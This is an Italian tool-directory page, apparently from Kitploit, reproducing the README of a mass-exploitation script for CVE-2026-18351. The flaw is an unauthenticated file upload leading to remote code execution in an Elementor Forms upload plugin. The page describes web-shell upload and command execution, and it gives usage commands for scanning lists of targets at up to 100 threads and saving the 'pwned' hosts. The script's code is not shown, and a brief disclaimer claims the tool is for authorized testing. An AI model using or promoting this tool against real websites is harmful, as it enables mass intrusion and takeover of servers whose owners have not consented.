Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-18351 — Strumento di exploit massivo per CVE-2026-18351, un caricamento arbitrario di file non autenticato con RCE in Elementor Forms <= 1.6.0, con probing passivo, upload della shell ed esecuzione di comandi. | Kitploit
Strumenti/GitHubGitHub/johenlastgen-jlg/cve-2026-18351
Scanner di VulnerabilitàExploitScripting e AutomazioneSfruttamento di Applicazioni WebSicurezza WebPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHub
johenlastgen-jlg/cve-2026-18351

CVE-2026-18351

Strumento di exploit massivo per CVE-2026-18351, un caricamento arbitrario di file non autenticato con RCE in Elementor Forms <= 1.6.0, con probing passivo, upload della shell ed esecuzione di comandi.

Vedi Repository
16h 29m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-18351

Strumento di exploit massivo per CVE-2026-18351 — Caricamento arbitrario di file non autenticato → RCE in Drag and Drop File Upload for Elementor Forms <= 1.6.0.

crediti johenlastgen | telegram @johenlastgen | canale @jlgnetworkredirect


Funzionalità

  • Sonda passiva di vulnerabilità (nessun caricamento)
  • Modalità exploit completa con caricamento della shell e conferma RCE
  • Supporto per target singolo e multipli
  • Supporto multi-thread
  • Esecuzione di comandi configurabile
  • File di output completo, solo vulnerabilità e solo pwned
  • Configurazione del timeout delle richieste

Requisiti

Nessuna dipendenza esterna — utilizza solo la libreria standard di Python.

root@kitploit:~
python3 --version  # 3.6+

Utilizzo

root@kitploit:~
# Target singolo — solo controllo passivo (nessun caricamento)
python3 mass.py --url http://target.com --check

# Target singolo — exploit con comando predefinito (id)
python3 mass.py --url http://target.com --cmd id

# Target singolo — exploit con comando personalizzato
python3 mass.py --url http://target.com --cmd whoami

# Target multipli — controllo passivo
python3 mass.py --list targets.txt --threads 50 --check

# Target multipli — exploit
python3 mass.py --list targets.txt --threads 50 --cmd id

# Target multipli — exploit con regolazione del timeout
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami

# Salva il log completo
python3 mass.py --list targets.txt --output results.txt

# Salva solo i target vulnerabili
python3 mass.py --list targets.txt --output-vuln vuln.txt

# Salva solo i target con RCE confermata
python3 mass.py --list targets.txt --output-pwned pwned.txt

# Output combinato
python3 mass.py \
  --list targets.txt \
  --threads 50 \
  --cmd id \
  --output results.txt \
  --output-vuln vuln.txt \
  --output-pwned pwned.txt

Opzioni

OpzioneDescrizione
--urlURL del target singolo
--list FILEFile contenente gli URL dei target (uno per riga)
--checkSolo sonda passiva — nessun caricamento di file
--cmd CMDComando da eseguire sulla shell (predefinito: id)
--threads NNumero di thread concorrenti (predefinito: 20)
--timeout NTimeout per richiesta in secondi (predefinito: 10)
--output FILESalva il log completo su file
--output-vuln FILESalva solo gli URL dei target vulnerabili su file
--output-pwned FILESalva solo i target con RCE confermata su file

Stati di Output

StatoSignificato
PWNEDShell caricata e RCE confermata
VULN-NO-EXECCaricamento accettato ma esecuzione della shell fallita
PATCHEDCaricamento rifiutato o nonce non trovato
ERRORErrore di rete o di parsing

Formato di targets.txt

Un URL per riga. Le righe che iniziano con # vengono ignorate.

root@kitploit:~
http://target1.com
https://target2.com
# questa riga viene ignorata
http://target3.com

Disclaimer

Questo progetto è fornito esclusivamente per valutazioni di sicurezza autorizzate, ricerca sulla sicurezza difensiva e validazione di vulnerabilità.

Utilizzando questo software, confermi di disporre di un'autorizzazione esplicita per valutare i sistemi target. L'accesso non autorizzato a sistemi informatici è proibito e può violare le leggi applicabili.

L'autore e i contributori non incoraggiano né approvano l'uso non autorizzato di questo progetto e non si assumono alcuna responsabilità per qualsiasi uso improprio, danno o conseguenza legale derivante dal suo utilizzo.


Autore

JohenLastGen — JLG NETWORK

Scarica lo strumento